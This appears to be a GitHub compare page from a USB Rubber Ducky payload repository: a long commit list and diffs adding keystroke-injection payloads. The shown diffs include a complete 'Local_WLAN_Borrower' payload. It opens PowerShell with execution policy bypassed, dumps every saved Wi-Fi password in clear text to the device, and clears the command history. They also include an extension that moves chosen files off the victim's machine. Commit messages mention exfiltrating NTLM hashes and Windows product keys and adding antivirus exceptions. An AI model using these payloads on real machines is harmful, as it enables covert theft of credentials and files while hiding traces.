Compare commits

...

100 Commits

Author SHA1 Message Date
salvat1on 18679b25c8
Merge 0d6f38865f into 675972662a 2024-09-26 20:49:47 +10:00
Peaks 675972662a
Merge pull request #484 from luu176/master
Exfiltrate NTLM hash using DS3
2024-09-24 19:27:52 -04:00
Luu 0df3011601
Update README.md 2024-09-25 00:23:30 +02:00
Luu a81ecd3e64
Update payload.txt 2024-09-25 00:21:49 +02:00
Luu c898ed7858
Create README.md 2024-09-25 00:20:06 +02:00
Luu 15f8f25701
Create payload.txt 2024-09-25 00:18:39 +02:00
Peaks adb9af43f8
Merge pull request #482 from aleff-github/patch-94
Same File Name Prank
2024-09-24 15:48:16 -04:00
Aleff 3cf199170c Update payload 2024-09-21 09:41:51 +02:00
Peaks fd272a60f4
Merge pull request #480 from aleff-github/patch-93
Replace Links In GithubDesktop
2024-09-20 14:03:29 -04:00
Aleff 9f1222ba05
Update payload.txt 2024-09-19 19:55:47 +02:00
Aleff d934d9d4de
removed a debug print 2024-09-18 19:31:24 +02:00
Aleff f031b928a8
Simple shifts in comments 2024-09-18 19:28:22 +02:00
Aleff bb89731ae2
Update payload.txt 2024-09-18 19:27:12 +02:00
Aleff 9c4257edbd Update README.md 2024-09-18 19:22:27 +02:00
Aleff d3e494fd12 Rename Everything Similarly
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.

Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.

![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)

> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.

![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)

> What it looks like instead if you turn on the extension view.
2024-09-18 19:21:22 +02:00
Peaks 02641718a0
Merge pull request #478 from aleff-github/patch-91
Install Any Arbitrary VSCode Extension
2024-09-17 18:06:23 -04:00
Aleff 2c84ff499c
Update payload.txt 2024-09-17 10:23:40 +02:00
Peaks 7883e2bc50
Merge pull request #479 from aleff-github/patch-92
Install Official VSCode Extension
2024-09-17 03:11:42 -04:00
Alessandro Greco b1fae99ade Update README.md 2024-09-16 14:54:17 +02:00
Alessandro Greco 52c42dfc10 Merge branch 'patch-93' of https://github.com/aleff-github/usbrubberducky-payloads into patch-93 2024-09-16 14:43:34 +02:00
Alessandro Greco 6e3f5924c0 Update payload.txt 2024-09-16 14:43:00 +02:00
Aleff 71d5eaf378
Bug in renderer regex
the link api.github.com needs to be correct
2024-09-16 14:42:11 +02:00
Alessandro Greco 1fa6cea874 [+] Replace Links In GithubDesktop
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user.
2024-09-16 14:30:19 +02:00
Aleff e5254c68a2
Update README.md
[+] Credits
2024-09-05 13:15:56 +02:00
Alessandro Greco d350174b13 Install Official VSCode Extension
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems.

The extension to be installed is specified via the `publisher.extensionName` parameter.

The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
2024-09-05 13:11:53 +02:00
Alessandro Greco 284195f4cd Install Any Arbitrary VSCode Extension
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:

1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.

The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
2024-09-05 09:52:58 +02:00
Peaks 45a1dc0f01
Merge pull request #345 from aleff-github/patch-62
Follow someone on Instagram
2024-09-04 12:41:08 -04:00
Peaks 0bebb446fd
Merge pull request #476 from aleff-github/patch-88
[+] PASSIVE_WINDOWS_DETECT
2024-09-02 12:22:54 -04:00
Aleff 7749aa95c1
DOWNARROW Error 2024-09-02 09:50:42 +02:00
Peaks 9f5f323a0d
Merge pull request #349 from aleff-github/patch-66
Update READMEs Aleff Credits
2024-09-01 20:02:13 -04:00
Peaks b697112f2b
Merge pull request #355 from aleff-github/patch-69
Play A Song On An iPhone
2024-09-01 18:03:28 -04:00
Peaks d4e64b9974
Merge pull request #353 from aleff-github/patch-67
Change Github Profile Settings
2024-09-01 18:01:34 -04:00
Peaks 29ac81bb31
Merge pull request #356 from aleff-github/patch-70
Call Someone On An iPhone
2024-08-30 08:44:45 -04:00
Peaks 4e44f6ef84
Merge pull request #358 from aleff-github/patch-71
Edit A Reminder On An iPhone
2024-08-30 08:43:38 -04:00
Peaks 42a455a7a2
Merge pull request #359 from aleff-github/patch-72
Delete A Reminder On An iPhone
2024-08-30 08:42:50 -04:00
Alessandro Greco 2ed20404a3 moved to execution 2024-08-30 11:14:54 +02:00
Alessandro Greco 777d28a254 Updated 2024-08-30 11:11:41 +02:00
Alessandro Greco af77fdb130 Removed duplicate 2024-08-30 11:08:48 +02:00
Alessandro Greco 6331122f51 Update script 2024-08-30 11:06:48 +02:00
Alessandro Greco c11425f7fd Update script 2024-08-30 11:04:59 +02:00
Alessandro Greco 60eb65fbbc Update 2024-08-30 11:00:03 +02:00
Aleff 40da51da72
[+] PASSIVE_WINDOWS_DETECT 2024-08-30 10:33:40 +02:00
Peaks be52f4d1c9
Merge pull request #475 from yeetboy0330/master
Add Local_WLAN_Borrower payload
2024-08-29 03:48:05 -04:00
Yeet 64a7666c12
Update payload.txt 2024-08-29 10:07:57 +10:00
Yeet 0e9ea1358b
Update README.md
Made the README.md worth reading
2024-08-29 10:07:34 +10:00
Peaks ad08ba6e36
Merge pull request #474 from PlumpyTurkey/master
Fix “Windows Product Key Grabber” payload
2024-08-23 05:27:29 -04:00
Yeet a1a7310d61
Added 1.ps1 file
this file borrows and stores the wifi passwords.
2024-08-23 10:11:24 +10:00
Yeet 04b71efc9b
Create README.md
added cool readme.md to describe my payload
2024-08-23 10:10:35 +10:00
Yeet ca6490cc9a
Create payload.txt 2024-08-23 10:06:44 +10:00
Julien M e4a7876a00 Update version badge 2024-08-22 22:17:24 +02:00
Julien M f7d2f37def Remove duplicate function 2024-08-22 22:16:56 +02:00
Peaks d02b817225
Merge pull request #400 from aleff-github/patch-80
Exfiltrate Windows Product Key
2024-08-21 18:42:57 -04:00
Alessandro Greco 828c60acca Adapted with DUCKY_DRIVE_LABEL 2024-08-21 07:41:47 +02:00
Peaks 404640f615
Merge pull request #427 from aleff-github/patch-83
Extension: SAVE FILES IN RUBBER DUCKY STORAGE
2024-08-20 17:04:28 -04:00
Alessandro Greco 9e6b405745 from - to _ 2024-08-20 12:33:10 +02:00
Alessandro Greco c895160753 from - to _ 2024-08-20 12:27:36 +02:00
Aleff 2e892e4b0e Aporting hak5peaks tips
[#] Extension renamed to `_` instead of `-` and only all caps
[#] Windows to all caps
[+] Added #DRIVER-LABEL
[#] Unordered spacing removed
2024-06-01 10:26:10 +02:00
Aleff 35fc314e15
Update payload.txt 2024-01-14 12:56:38 +01:00
Aleff 203bf15391
Update README.md 2024-01-14 12:56:23 +01:00
Aleff 76b023efa3
Update README.md 2024-01-14 12:55:18 +01:00
Aleff dc5c20e7ac Update README.md 2024-01-14 11:51:58 +01:00
Aleff bf9ec4cfc0 Merge remote-tracking branch 'upstream/master' into patch-66 2024-01-14 11:43:28 +01:00
Aleff 8d3adb90ad space removed 2024-01-14 11:27:35 +01:00
Aleff 7652db1704 Extension: SAVE FILES IN RUBBER DUCKY STORAGE
Creation of the extension "SAVE FILES IN RUBBER DUCKY STORAGE" based on the old proposal "Send Files Through Dropbox - Windows"[1]

[1] https://github.com/hak5/usbrubberducky-payloads/pull/399
2024-01-04 17:04:18 +01:00
Aleff e595d71ac3 USB Rubber Ducky Storage
The method of data storage via USB Rubber Ducky storage has been added.
2024-01-04 16:31:43 +01:00
aleff-github 0bd6624877 README 2023-11-03 12:45:02 +01:00
Aleff 40b33c703e
Exfiltrate Windows Product Key
Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook.
2023-11-03 12:44:11 +01:00
aleff-github 81077db152 moved to execution 2023-10-19 08:57:45 +02:00
aleff-github 22a5428515 optimization 2023-10-19 08:51:07 +02:00
aleff-github 3b2fee98fc Moved to new category 2023-10-18 11:32:54 +02:00
aleff-github a9fb6e98dd moved to execution 2023-10-18 11:28:05 +02:00
aleff-github da5acc3da0 renamed properly 2023-10-18 11:03:14 +02:00
aleff-github 899ad2c484 Moved to execution 2023-10-18 10:22:23 +02:00
aleff-github bf1cf5957b Conceptual errors 2023-10-18 09:25:55 +02:00
aleff-github 088512fbba renamed properly 2023-10-18 08:56:32 +02:00
Aleff badf3a7705
Update README.md 2023-07-06 08:38:53 +02:00
aleff-github b728f4d525 Create README.md 2023-07-01 09:27:14 +02:00
Aleff c19eca930e
Delete A Reminder With An iPhone 2023-07-01 09:26:30 +02:00
aleff-github 8cd2d9d8b5 Create README.md 2023-07-01 09:23:19 +02:00
Aleff 826ca00433
Edit A Reminder With An iPhone 2023-07-01 09:22:43 +02:00
aleff-github 868c86ea30 Create README.md 2023-06-29 11:51:23 +02:00
Aleff 670d85768a
Call Someone With An iPhone 2023-06-29 11:50:44 +02:00
aleff-github ba821b39d2 Create README.md 2023-06-29 11:41:41 +02:00
Aleff 7adf46b49d
Play A Song With An iPhone 2023-06-29 11:40:13 +02:00
aleff-github 1bd6172bb7 Update README.md 2023-06-27 09:43:10 +02:00
aleff-github 3ebbdd8851 PayloadStudio >= 1.3.1 2023-06-27 08:29:39 +02:00
aleff-github c1a67472f5 Create README.md 2023-06-26 17:04:49 +02:00
Aleff eb254e0d30
Change Github Profile Settings 2023-06-26 17:03:41 +02:00
aleff-github ec0979eaf6 Update 2023-06-25 00:40:23 +02:00
aleff-github 838d032b5b Update 2023-06-16 23:58:45 +02:00
aleff-github b2a64152dc Update completed 2023-06-16 23:57:08 +02:00
Aleff 2f349d93ab
Update READMEs Aleff Credits
I decided I wanted to add a credits section to the README files of the previously uploaded payloads so I will use a single pull request to do this
2023-06-16 23:45:18 +02:00
Aleff 07b0b4d7b1
Update README.md 2023-06-16 23:28:35 +02:00
aleff-github 2d8482cb36 Update payload.txt 2023-06-13 09:33:58 +02:00
aleff-github 9aa67fa102 Create README.md 2023-06-13 09:25:24 +02:00
Aleff b4859f9ec6
Follow someone on Instagram 2023-06-13 09:24:28 +02:00
salvat1on 0d6f38865f
Add files via upload
Added recon payload
Added Pin cracker
Added prank payload
2023-05-26 12:41:09 -04:00
salvat1on 36cad746ab
Update README.md 2023-05-26 12:40:06 -04:00
salvat1on 1775ec1f2a
Update swipe-to-open.txt
Added while statements to tidy up code
Added delete notifications to end
Added attackmode off to the end
2023-05-26 12:39:27 -04:00
salvat1on ca1fda122e
Add files via upload
Install apk from ducky storage
2023-05-16 09:30:44 -04:00
85 changed files with 3946 additions and 149 deletions

View File

@ -0,0 +1,103 @@
# Save Files In Rubber Ducky Storage - Windows
This extension can be used to save one or more files through the USB Rubber Ducky storage without having to copy and paste reused code every time, but standardizing a methodology that avoids errors.
```
How many files do you want to save?
|
|-- Single File
| |
| |-- Do you already know the full file path? (e.g., C:\Users\Aleff\Downloads\photo.png)
| | |
| | |-- Use the SINGLE_FILE version
| | | |
| | | |-- Set #FLAG_SINGLE_FILE to TRUE
| | | |-- Define the file path in #SINGLE_PATH
| | |
| |-- Don't know the full path but can obtain it at runtime through PowerShell?
| | |
| | |-- Use the $fileToSavePath variable
| | | |
| | | |-- Set #FLAG_SINGLE_FILE to TRUE
| | | |-- Obtain the file path through PowerShell and assign it to $fileToSavePath
|
|-- Multiple Files
| |
| |-- Set the #FLAG_SINGLE_FILE variable to FALSE
| | |
| | |-- Use an array of strings named $fileToSavePaths to collect the paths of all the files you want to use
```
## Target Environment
- **Target**: Windows PowerShell
## Usage
Insert this extension when you have one or more files that you want to save via USB Rubber Ducky storage.
## Configuration
Before using the extension, you need to configure it by setting certain variables in the DuckyScript payload. Here are the configuration options:
### Driver Label
This extension utilizes the 'Get-Volume' command to scan the available volumes on the computer where the command is executed, aiming to detect our USB Rubber Ducky device. Upon detection, the device is selected to serve as a reference, allowing us to perform data saving operations. By default, USB Rubber Duckys are identified by the label 'DUCK'. However, this label can be altered, particularly if we want to keep the operation discreet. If the default label has been changed, it will be necessary to update the #DRIVER_LABEL variable with the correct label.
### Single File or Multiple Files
You can choose to send a single file or multiple files. Configure the extension accordingly.
#### Single File Configuration
- **Variable**: #FLAG_SINGLE_FILE
- **Type**: Boolean (TRUE or FALSE)
- **Description**: Set #FLAG_SINGLE_FILE to TRUE if you want to save just one file. In this case, you will need to specify the file path within the #SINGLE_PATH variable. Alternatively, you can acquire the file path at runtime via PowerShell and store it in the $fileToSavePath variable.
Example in DuckyScript:
```DuckyScript
DEFINE #FLAG_SINGLE_FILE TRUE
DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
```
Example in PowerShell before using the extension:
```powershell
$fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
```
#### Multiple Files Configuration
- **Variable**: #FLAG_SINGLE_FILE
- **Type**: Boolean (TRUE or FALSE)
- **Description**: Set #FLAG_SINGLE_FILE to FALSE if you want to save multiple files. In this case, in PowerShell, you will have to create the variable $fileToSavePaths, which is an array of strings containing the list of paths related to the files you want to export.
Example in PowerShell before using the extension:
```powershell
$fileToSavePaths = @(
"C:\Users\Aleff\Downloads\photo.png",
"C:\Users\Aleff\Downloads\document.pdf",
"C:\Users\Aleff\Downloads\song.mp3"
)
```
**Tips for Working with Arrays in PowerShell:**
- How to create an array:
```powershell
$fileToSavePaths = @()
```
- How to add an element to the array:
```powershell
$fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
```
- How to view the array:
```powershell
$fileToSavePaths
```
That's it! You can now use this extension with the appropriate configuration to save files via the USB Rubber Ducky storage using the same USB Rubber Ducky.

View File

@ -0,0 +1,68 @@
EXTENSION SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS
REM VERSION 1.0
REM AUTHOR: Aleff
REM_BLOCK Documentation
This extension is used to save one or more files through the USB Rubber Ducky storage.
TARGET:
Windows 10/11
USAGE:
Insert this extension when you have one or more files that you want to save in your USB Rubber Ducky.
CONFIGURATION:
Set #DRIVER_LABEL variable with the correct Label of your USB Rubber Ducky considering that the default value is 'DUCK'.
Set #FLAG_SINGLE_FILE with TRUE if you want to save just one file.
In this case you will need to specify the file path within the #SINGLE_PATH variable OR, in case the exact path to the file you can only acquire it at runtime and so via the powershell, use in the powershell the $fileToSavePath variable to capture this path.
i.e. in DuckyScript EXTENSION
DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
i.e. in PowerShell before extension
$fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
Set #FLAG_SINGLE_FILE FALSE if you want to send multiple files.
In this case in the PowerShell you will have to create the variable $fileToSavePaths, which is an array of strings that should contain the list of paths related to the files you want to save.
i.e. in PowerShell before extension:
$fileToSavePaths = @(
"C:\Users\Aleff\Downloads\photo.png",
"C:\Users\Aleff\Downloads\document.pdf",
"C:\Users\Aleff\Downloads\song.mp3"
)
Some tips:
How to create an Array?
> $fileToSavePaths = @()
How to add an element?
> $fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
How to see the array?
> $fileToSavePaths
END_REM
REM Settings
DEFINE #DRIVER_LABEL DUCK
DEFINE #FLAG_SINGLE_FILE FALSE
DEFINE #SINGLE_PATH 0
REM Extension Code
FUNCTION SAVE_SINGLE_FILE()
IF ( #SINGLE_PATH != 0 ) THEN
STRINGLN mv #SINGLE_PATH >> ${m}:\
ELSE IF ( #SINGLE_PATH == 0 ) THEN
STRINGLN mv ${fileToSavePath} >> ${m}:\
END_IF
END_FUNCTION
FUNCTION SAVE_MULTIPLE_FILES()
STRINGLN
foreach ($fileToSavePath in $fileToSavePaths) {
mv ${fileToSavePath} >> ${m}:\
}
END_STRINGLN
END_FUNCTION
STRINGLN $m=(Get-Volume -FileSystemLabel '#DRIVER_LABEL').DriveLetter;
IF_DEFINED_TRUE #FLAG_SINGLE_FILE
SAVE_SINGLE_FILE()
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #FLAG_SINGLE_FILE
SAVE_MULTIPLE_FILES()
END_IF_DEFINED
END_EXTENSION

View File

@ -19,11 +19,29 @@ Opens a shell, get the WiFi names, get the passwords using nmcli, send the resul
* Dropbox Token * Dropbox Token
* Permissions * Permissions
### Executing program
* Plug in your device
### Settings ### Settings
* Set the Dropbox token * Set the Dropbox token
* Set the sudo password * Set the sudo password
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,49 @@
# Define the volume label you're looking for
$targetLabel = "DUCKY"
# Find the drive letter of the USB drive with the specified label
$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
if ($volume) {
$driveLetter = $volume.DriveLetter + ":\"
$usbPath = "$driveLetter$env:username.txt"
$baseDestinationDir = $driveLetter
Write-Output "Drive letter found: $driveLetter"
} else {
Write-Error "Drive with label '$targetLabel' not found."
exit
}
# Initialize an array to store all Wi-Fi profiles and their passwords
$wifiData = @()
# Get all Wi-Fi profiles
$profiles = netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+'
foreach ($profile in $profiles) {
$wlan = $profile.Matches.Value.Trim()
# Get the password for the current Wi-Fi profile
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
$password = if ($passw) { $passw.Matches.Value.Trim() } else { "No Password Found" }
# Create a custom object with the profile and password information
$wifiData += [PSCustomObject]@{
Username = $env:username
Profile = $wlan
Password = $password
}
}
# Convert the array of Wi-Fi data to JSON
$jsonBody = $wifiData | ConvertTo-Json -Depth 3
# Save the JSON data to a file on the USB drive
$jsonBody | Out-File -FilePath $usbPath -Encoding UTF8
# Clear the PowerShell command history
Clear-History
exit

View File

@ -0,0 +1,7 @@
### Local_WLAN_Borrower
This script borrows the wifi passwords on the target system and puts them into a .txt file on the ducky.
# Setup
Firstly, download and place the _1.ps1_ script onto the root of your ducky. Then, you will need to edit the inject.txt file accordingly:
On line 57, change "DUCKY" to the label of your USB. On line 59, change 1.ps1 to the name of the PS1 script on your ducky.
Inside of the PS1 script, you will need to replace _DUCKY_ on line 2 with the label of your USB.

View File

@ -0,0 +1,79 @@
REM Title: Local_WLAN_Borrower
REM Description: Borrows wifi passwords and saves them on the DUCKY
REM Author: YEETBOY0330
REM Props: Zero_Sploit(DUCKY-WIFI-GRABBER) + Hak5 Team
REM Version: 1.0
REM Category: Creds
REM Target: Windows 10 & 11
REM Attackmodes: HID, STORAGE
ATTACKMODE HID STORAGE
DEFAULTDELAY 20
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM change this to your drive label
DEFINE #DRIVE_LABEL DUCKY
REM change this to the name of your PS1 script
DEFINE #PS1_FILE_NAME 1.ps1
IF ($_OS == WINDOWS) THEN
REM Initial Delay
DELAY 1000
REM Opens powershell with script execution enabled
GUI r
DELAY 700
STRINGLN powershell -ExecutionPolicy Bypass
DELAY 4000
REM Gets usb drive letter of #DRIVE_LABEL
STRINGLN_POWERSHELL
$targetLabel = "#DRIVE_LABEL"
$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
$driveLetter = $volume.DriveLetter + ":"
cd $driveletter
END_STRINGLN
REM Runs powershell script
STRINGLN .\#PS1_FILE_NAME
END_IF

View File

@ -1,8 +1,8 @@
# WLAN Windows Password - BADUSB ✅ # WLAN Windows Password
A script used to stole target WLAN Passwords. A script used to stole target WLAN Passwords.
**Category**: WLAN, Credentials **Category**: Credentials
## Description ## Description
@ -24,3 +24,25 @@ Then it cleans up traces of what you have done after.
* Plug in your device * Plug in your device
* Invoke 2 netsh commands * Invoke 2 netsh commands
* Invoke-WebRequest will be entered in the Run Box to send the content * Invoke-WebRequest will be entered in the Run Box to send the content
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -2,7 +2,7 @@
This script can be used to put an arbitrary exception path in the Avast app. This script can be used to put an arbitrary exception path in the Avast app.
**Category**: Execute **Category**: Execution
## Description ## Description
@ -21,4 +21,26 @@ DEFINE FULL-PATH example/to/path
### Dependencies ### Dependencies
* The target must have **Avast installed** and **configured** on the machine * The target must have **Avast installed** and **configured** on the machine
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Add An Exception To Avast Antivirus | REM # Title : Add An Exception To Avast Antivirus |
REM # Author : Aleff | REM # Author : Aleff |
REM # Version : 1.0 | REM # Version : 1.0 |
REM # Category : Execute | REM # Category : Execution |
REM # Target : Windows 10/11 | REM # Target : Windows 10/11 |
REM # | REM # |
REM ######################################################## REM ########################################################

View File

@ -0,0 +1,56 @@
# Call Someone On An iPhone
This script can be used to call someone really fast using an iPhone, so iOS system.
**Category**: Execution
## Description
This script can be used to call someone really fast using an iPhone, so iOS system.
Open search bar, then open the Phone app (I used the italian name so 'Telefono'), then delete what is (hidden) stored and write the number, then call it.
## Dependencies
* The phone must be unlocked
## Test
- iPhone 14
- iOS 16.4.1
## Settings
- You need to change the name of the application according to the language you have on your phone.
```DuckyScript
[20] DEFINE #PHONE-APP-NAME
```
- You must set the phone number to be called
```DuckyScript
[22] DEFINE #NUMBER example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,32 @@
REM ##############################################
REM # |
REM # Title : Call Someone On An iPhone |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : iPhone |
REM # |
REM ##############################################
REM Requirements:
REM - The phone must be unlocked
REM Tested on:
REM - iPhone 14
REM - iOS 16.4.1
REM You need to change the name of the application according to the language you have on your phone.
DEFINE #PHONE-APP-NAME example
REM You must set the phone number to be called
DEFINE #NUMBER example
GUI SPACE
DELAY 300
STRING #PHONE-APP-NAME
ENTER
DELAY 1000
BACKSPACE
STRING #NUMBER
DELAY 500
ENTER

View File

@ -2,7 +2,7 @@
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded. This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
**Category**: Execute **Category**: Execution
## Description ## Description
@ -54,4 +54,26 @@ To make it easier to use below you can find the various tested configurations, a
- REM Define the branch of the new repository Repository2, i.e. "main" - REM Define the branch of the new repository Repository2, i.e. "main"
```DuckyScript ```DuckyScript
DEFINE #BRANCH example DEFINE #BRANCH example
``` ```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Change Remote Git Link | REM # Title : Change Remote Git Link |
REM # Author : Aleff | REM # Author : Aleff |
REM # Version : 1.0 | REM # Version : 1.0 |
REM # Category : Execute | REM # Category : Execution |
REM # Target : Windows 10-11/Linux | REM # Target : Windows 10-11/Linux |
REM # | REM # |
REM ########################################### REM ###########################################

View File

@ -25,4 +25,26 @@ Opens a shell, get the network card name, set the new MAC address, erase traces.
### Settings ### Settings
* Set the sudo password * Set the sudo password
* Change as you want the new MAC address * Change as you want the new MAC address
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -17,11 +17,29 @@ Opens a shel, get the network card name, set the network configuration, erase tr
* Linux Permissions * Linux Permissions
### Executing program
* Plug in your device
### Settings ### Settings
* Set the sudo password * Set the sudo password
* Change as you want the network configuration * Change as you want the network configuration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,84 @@
# Change Github Profile Settings
This script can be used to edit Github account settings speeding up the editing process.
The script will run a shell and open the default browser in `https://github.com/settings/profile` and close the powershell. When the page is open go to the profile settings TABing many times.
**Category**: Execution
## Getting Started
### Dependencies
* Internet connection
* Logged in Github
* PayloadStudio >= 1.3.1
### Settings
- Here you should define the new name
```DuckyScript
[19] DEFINE #NAME example
```
- Here you should define the new Biography
```DuckyScript
[20] DEFINE #BIO example
```
- Here you should define the custom pronouns
```DuckyScript
[21] DEFINE #CUSTOM-PRONOUNS example
```
- Here you should define the new personal website url
```DuckyScript
[22] DEFINE #URL example
```
- Here you should define the new social network links
```DuckyScript
[23] DEFINE #SOCIAL-ACCOUNT-1 example
[24] DEFINE #SOCIAL-ACCOUNT-2 example
[25] DEFINE #SOCIAL-ACCOUNT-3 example
[26] DEFINE #SOCIAL-ACCOUNT-4 example
```
- Here you should define the new company
```DuckyScript
[27] DEFINE #COMPANY example
```
- Here you should define the new location
```DuckyScript
[28] DEFINE #LOCATION example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,108 @@
REM_BLOCK
###################################################
# #
# Title : Change Github Profile Settings #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
